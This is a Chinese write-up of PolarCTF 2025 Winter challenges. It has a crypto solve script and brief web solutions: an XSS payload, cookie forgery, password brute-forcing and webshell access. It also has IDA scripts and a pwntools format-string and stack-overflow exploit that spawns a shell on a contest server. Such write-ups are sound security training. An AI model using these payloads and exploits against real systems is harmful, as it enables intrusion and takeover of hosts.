PolarCTF 2025冬季挑战赛 WP
1-7 Virtual_currency
本题思路如下:
仿真ubuntu
账号huanglei密码19460214
执行查看ip、启动镜像操作
1、然后可以打开ip地址查看平台
可以看出是Polar币
2-4、火眼仿真查看日志
答案都在末尾一部分
5、显示隐藏文件C盘根目录找到一个exe
1-8 Source of danger
本题思路如下:
1、 过滤http
2、 追踪流发现是Edge
3、 对象可导出
ChatGPT
4-5、最后有一个upload,发现是Python上传的,网站就是对应那个
2-2 EzAES
本题思路如下: |
2-4 xiaoji的RSA
import libnum
from Crypto.Util.number import long_to_bytes
# 题目给出的数据
h1 = 14598570770570369251044298637863318854969244053819114954671895416691350802920687681668270301378543649113252159681469894140327953343981428435557763783575047421073785093934100988516182011757805151301552786226747639175213248064364104458391503594386384710007637410647669428289271030281975860741433987188926890687769189330536656978907095466736760156091550669274865538908426382007469741745093518762985240171234021436305408209014615992584706412209748494302146308826117702351113891442300797965409831595569786933763773967575744129781374727612526423706127336276048951135368854093017991855415497273999713365969103371554004824509
h2 = 11655430400126708521266628893465012008156070100550313215125940102411494976112918677189030755406554269846801368688286768397687408859238412058773272768466345174217960738213084397497134648104645110774595383007722678343723326165844773931623583737649558732929341710652376370393000666923877685083880991816166675473675993119565288119886891401337292448811477124318462203416303782364411201690259713617106545395093938159021072322598644028525378190756212177234492649667270787158675885995463312527798325191816554894434526912762675422186788558909636033206644624947398671285555871818986699430277747968998624440765160214625508302582
n = 16117539256891249484718413429700173002583084988861340273782389608188420881800342876872775121756821301056788500260045796850939585388076522939011021777251658702207624594144564384121357888401608404641571728859619754015070281985119363898471820577703197516678288716301039869441770173970562352919565912788016889342101896134309321994797037369608180360632790282197647969119609543804552490560372790883065970972189091831856508916272396614853136857081227250153104695845022919856333090412792344985816893032033703744649648621089458783293225651830841418574525258165458710362104364949367148707705685722700758399918195168711661909001
c_sum = 18062960292926203405106631570645792887346762710596094595946201638145269792362432970619678514073768330282072122297774770846723026262793638145140252714036118255298935496782643261099997757452005888950084317572578983859160308143219449311014720216597693717833093096186064214815571678655104145532183363580096161113659794514705540535423432576540755810113817779577012494191762397204056012915596163266097092210799790994886142736276356044755057247863118120000651380079123033610186723297866795705886993017274323290850712391555552018597217459748407996232225971214252337750534257640641166056960137653051788480104937847471213865531
leak = 29786109562795434767286575222202920392934698151772733519827029723076564127577506924725472620552207928305324807071633980845799428305323747287497587012814817694240321762385052643719779704776885137653915759833442842418374852111545817139388092965791383085268376283252367393215830021523854878152740193684532064211244526477475872824124551317767515936013314015487953976823909663377712672258700701049790904432754196590520755614551428222850284265995888579989169357385240073615572407415594868320441237551194011351100321407974631166974196395240849462596136681294133772802147270429624576958515766511950802469230517874955000694776
# 1. 恢复 c1, c2
# c1 + c2 = c_sum
# 2*c1 - c2 = leak
# 两式相加: 3*c1 = c_sum + leak
c1 = (c_sum + leak) // 3
c2 = c_sum - c1
# 2. 分解 N
e1 = 7717
e2 = 8859
# 构造 GCD 攻击
# h1^e2 * 2025^(e1*e2) == h2^e1 * 2024^(e1*e2) (mod p)
val1 = pow(h1, e2, n) * pow(2025, e1 * e2, n) % n
val2 = pow(h2, e1, n) * pow(2024, e1 * e2, n) % n
diff = (val1 - val2) % n
p = libnum.gcd(diff, n)
q = n // p
print(f"[+] Found p: {p}")
print(f"[+] Found q: {q}")
# 3. RSA 解密
e = 0x10001
phi = (p - 1) * (q - 1)
d = libnum.invmod(e, phi)
m1 = pow(c1, d, n)
m2 = pow(c2, d, n)
flag_part1 = long_to_bytes(m1)
flag_part2 = long_to_bytes(m2)
print(f"[+] Flag: {flag_part1 + flag_part2}")
3-1 来个弹窗2.0
本题思路如下:<img src=x onerror=alert(0)>弹窗成功 是海贼王里的,直接做  |
3-2 help
| 本题思路如下: Base64转一下就行  |
3-3 cookie欺骗2.0
| 本题思路如下: 测试账号登录,发现cookie组成形式user用户名,auth是rot13编码改一下就行   |
3-4 uii
本题思路如下: Payload:?uii=%59zz  |
3-6 aa
| 本题思路如下: 有个i.php  |
进入后解题, 这三个连在一起就是flag |
3-8 PolarShop
| 本题思路如下: 抓包修改金币数  第二个是账号,第三个是密码本  Bp爆破出密码,密码是5qu1rtle 扫出/admin.php Cookie也改掉  |
3-9 金币大挑战
| 本题思路如下: 延迟发包进入论坛 最后有个文件密码1170 进去之后得到Squirtle1170 根据论坛的提示找到/uploads/Squirtle.php,拿上面的密码进行蚁剑  |
3-10 论坛
| 本题思路如下: 扫出来一个  提示也是进论坛  直接访问即可  |
3-11 polarflag
|本题思路如下:
密码本给了
账号提示在flag.php
解密后得出账号为polar
账号polar密码6666
先ls
Flag叫polarflag
|
4-1 练习1
用mcp分析
首先写ida脚本导出可能的flag
# export_ida_strings2.py
# 在 IDA 中运行:File -> Script file... 选择本文件
from __future__ import print_function
import idautils
import idaapi
import idc
import sys
import os
import re
out_path = r"C:\Users\liang\Desktop\ida_strings.txt"
# 可扩展关键词列表
keywords = ['flag', 'FLAG', 'CTF', 'picoCTF', 'flag{', 'FLAG{', 'FLAG:', 'flag:']
def read_str_at(ea):
# 尝试读取 C 字符串(按字节)
try:
b = idc.get_strlit_contents(ea, -1, idc.STRTYPE_C)
if b:
try:
return b.decode('utf-8', 'ignore')
except:
return b.decode('latin-1', 'ignore')
except Exception:
pass
# 尝试读取 unicode/wide 字符串
try:
b = idc.get_strlit_contents(ea, -1, idc.STRTYPE_C_16)
if b:
try:
return b.decode('utf-16le', 'ignore')
except:
return b.decode('latin-1', 'ignore')
except Exception:
pass
# 备用:如果 idautils.Strings 对象有 .value/.str/.string 字段
return None
def normalize(s):
if s is None:
return ""
return s.replace('\r','').replace('\n','\\n')
def main():
strings = list(idautils.Strings())
matches = []
total = 0
with open(out_path, 'w', encoding='utf-8', errors='ignore') as out:
out.write("EA\tType\tString\n")
for s in strings:
total += 1
ea = getattr(s, 'ea', getattr(s, 'start', None))
# try extracting by idc API
text = None
if ea:
text = read_str_at(ea)
# fallback to attributes of the object
if not text:
# Some IDA versions expose different attributes
for attr in ('value','string','str','cstr'):
if hasattr(s, attr):
try:
v = getattr(s, attr)
if isinstance(v, (bytes, bytearray)):
try:
text = v.decode('utf-8','ignore')
except:
text = v.decode('latin-1','ignore')
else:
text = str(v)
break
except Exception:
continue
if not text:
# last resort: try idc.get_wide_word/byte sequences - skip for speed
text = "<unreadable>"
out.write("0x{0:X}\t{1}\t{2}\n".format(ea if ea else 0, type(s).__name__, normalize(text)))
# 查关键词(不区分大小写并保留原文判断)
low = text.lower() if isinstance(text, str) else ""
for k in keywords:
if k.lower() in low:
matches.append((ea, text))
break
print("Wrote {} strings to: {}".format(total, out_path))
if matches:
print("Possible flag-like matches (EA, string):")
for ea, text in matches:
print("0x{0:X}\t{1}".format(ea if ea else 0, text))
else:
print("No obvious flag-like strings found (checked keywords {}).".format(keywords))
if __name__ == "__main__":
main()
然后发现疑似flag,再看函数
# find_xrefs_and_decompile.py
# 在 IDA 中运行:File -> Script file... 或 Alt+F7
from __future__ import print_function
import idautils
import idaapi
import idc
import sys
TARGET_EA = 0x14001ACF0 # 要检查的字符串地址
def read_string(ea):
try:
b = idc.get_strlit_contents(ea, -1, idc.STRTYPE_C)
if b:
try:
return b.decode('utf-8', 'ignore')
except:
return b.decode('latin-1', 'ignore')
except:
pass
try:
b = idc.get_strlit_contents(ea, -1, idc.STRTYPE_C_16)
if b:
try:
return b.decode('utf-16le', 'ignore')
except:
return b.decode('latin-1', 'ignore')
except:
pass
return "<no-string>"
def decompile_func_at(ea):
try:
cfunc = idaapi.decompile(ea)
return str(cfunc)
except Exception as e:
# Hex-Rays 不可用或反编译失败,返回部分反汇编作为回退
lines = []
for i, insn in enumerate(idautils.FuncItems(ea)):
lines.append("0x{0:X}: {1}".format(insn, idc.GetDisasm(insn)))
if i > 200:
break
return "\n".join(lines)
def main():
print("Target EA: 0x{0:X}".format(TARGET_EA))
print("String at target:", read_string(TARGET_EA))
print("Searching XrefsTo...")
xrefs = list(idautils.XrefsTo(TARGET_EA))
if not xrefs:
print("No Xrefs found to 0x{0:X}.".format(TARGET_EA))
return
for xr in xrefs:
print("-" * 60)
print("Ref from: 0x{0:X} type:{1}".format(xr.frm, xr.type))
func = idaapi.get_func(xr.frm)
if func:
start = func.start_ea
end = func.end_ea
print("Function: 0x{0:X} - 0x{1:X}".format(start, end))
print("Attempting to decompile function at 0x{0:X} ...".format(start))
decomp = decompile_func_at(start)
print(decomp)
else:
print("No function contains the ref (maybe data xref). Disasm around ref:")
# print a few instructions around the ref
for addr in range(max(0, xr.frm-16), xr.frm+16, 1):
# only print valid instructions
try:
d = idc.GetDisasm(addr)
if d:
print("0x{0:X}: {1}".format(addr, d))
except:
pass
if __name__ == "__main__":
main()
最后自动分析得到结果
5-4 choice
_#!/usr/bin/env python3_
from pwn import *
_# pwntools PoC:_ _利用 format-string 覆盖 printf@GOT 为 backdoor 地址_
_#_ _说明:此脚本假设在本地运行 ./pwn1(与 IDA 中打开的二进制相同)。_
_#_ _如果是远程服务,请将 process(...) 替换为 remote(host, port)_
exe_path = './pwn1'
elf = ELF(exe_path)
context.binary = elf
context.terminal = ['powershell.exe', '-c']
**def** fuzz_offset():
_#_ _自动化探测偏移量和 Canary_
print("Starting fuzzing...")
for i in range(1, 40):
try:
p = remote('1.95.7.68', 2089) _#_ _或者 process(exe_path) 本地测试_
_#_ _接收菜单_
p.recvuntil(**b**'enter your choice:')
p.sendline(**b**'2')
_#_ _接收提示_
p.recvuntil(**b**'think again')
_#_ _发送 payload_
_#_ _使用 send 而不是 sendline,避免不必要的换行符占用空间,除非需要_
_#_ _但是 read 会一直读直到 32 字节或者 EOF?_
_#_ _不,read(0, buf, 32) 会阻塞直到有输入。_
_#_ _如果是终端,按回车会发送数据。_
_#_ _让我们发送明确的 payload_
payload = **f**'%{i}$p'.encode()
p.sendline(payload)
_#_ _读取输出_
_# printf(buf)_ _会输出我们的 payload 解析结果_
_#_ _紧接着函数返回,回到 main 循环,再次打印菜单 "what's the game plan?"_
_#_ _所以我们可以读取直到 "what's the game plan?"_
try:
_#_ _读取所有输出直到下一个菜单出现_
response = p.recvuntil(**b**"what's the game plan?", timeout=1)
_#_ _我们的泄露信息应该在 response 开头_
print(**f**'Offset {i}: {response}')
except EOFError:
print(**f**'Offset {i}: EOF')
except Exception as e:
print(**f**'Offset {i}: Timeout or Error {e}')
p.close()
except Exception as e:
print(**f**'Offset {i} error: {e}')
if 'p' in locals(): p.close()
**def** exploit_canary():
_# 1._ _利用 fmt 泄露 Canary_
p = remote('1.95.7.68', 2089)
_# Step 1: Select Plan 2 (Format String) to leak Canary_
p.recvuntil(**b**'enter your choice:')
p.sendline(**b**'2')
p.recvuntil(**b**'think again')
_#_ _发送 payload 泄露 Canary (Offset 25)_
_#_ _注意:read 只能读 32 字节,payload 要短_
p.sendline(**b**'%25$p')
_#_ _解析输出_
try:
_#_ _读取直到菜单再次出现,中间包含泄露信息_
output = p.recvuntil(**b**'enter your choice:')
print(**f**"Leak output raw: {output}")
_#_ _提取 hex 字符串_
import re
_#_ _查找类似于 0x... 的字符串_
match = re.search(**b**'(0x[0-9a-f]+)', output)
if not match:
log.error("Failed to find leak in output")
return
canary_str = match.group(1)
canary = int(canary_str, 16)
log.info(**f**"Canary found: {hex(canary)}")
_#_ _验证 Canary 特征 (低字节为 00)_
if (canary & **0x**ff) != 0:
log.warning("Warning: Leaked value does not look like a canary (LSB != 00)")
_# Step 2: Select Plan 1 (Stack Overflow)_
p.sendline(**b**'1')
p.recvuntil(**b**'are you sure?')
_#_ _构造栈溢出 payload_
_# buf (152 bytes) + canary (8 bytes) + saved_rbp (8 bytes) + return_addr_
_#_ _注意:p64 需要 from pwn import *_
backdoor_addr = **0x**40095b
_#_ _尝试跳过 prologue 以解决栈对齐问题,或者添加 ret gadget_
_# 0x40095b: push rbp_
_# 0x40095c: mov rbp, rsp_
_# 0x40095f: mov edi, ..._
_#_ _查找 ret gadget 用于对齐_
_# ROPgadget --binary pwn1 | grep ret_
_#_ _或者直接用 pwntools_
rop = ROP(elf)
ret_gadget = rop.find_gadget(['ret'])[0]
log.info(**f**"Ret gadget: {hex(ret_gadget)}")
payload = **b**'A' * 152
payload += p64(canary)
payload += **b**'B' * 8 _# saved rbp_
_#_ _尝试 1: 直接跳转 (已失败)_
_# payload += p64(backdoor_addr)_
_#_ _尝试 2: 添加 ret gadget 对齐栈_
payload += p64(ret_gadget)
payload += p64(backdoor_addr)
log.info(**f**"Sending payload length: {len(payload)}")
p.sendline(payload)
_#_ _切换到交互模式_
_#_ _如果成功,应该获得 shell_
p.interactive()
except Exception as e:
log.error(**f**"Exploit failed: {e}")
p.close()
if __name__ == '__main__':
_#_ _建议先运行 fuzz 确定 offset,然后运行 exploit_
_# fuzz_offset()_
exploit_canary()
6-3 点击挑战
真的点了一万次
浙公网安备 33010602011771号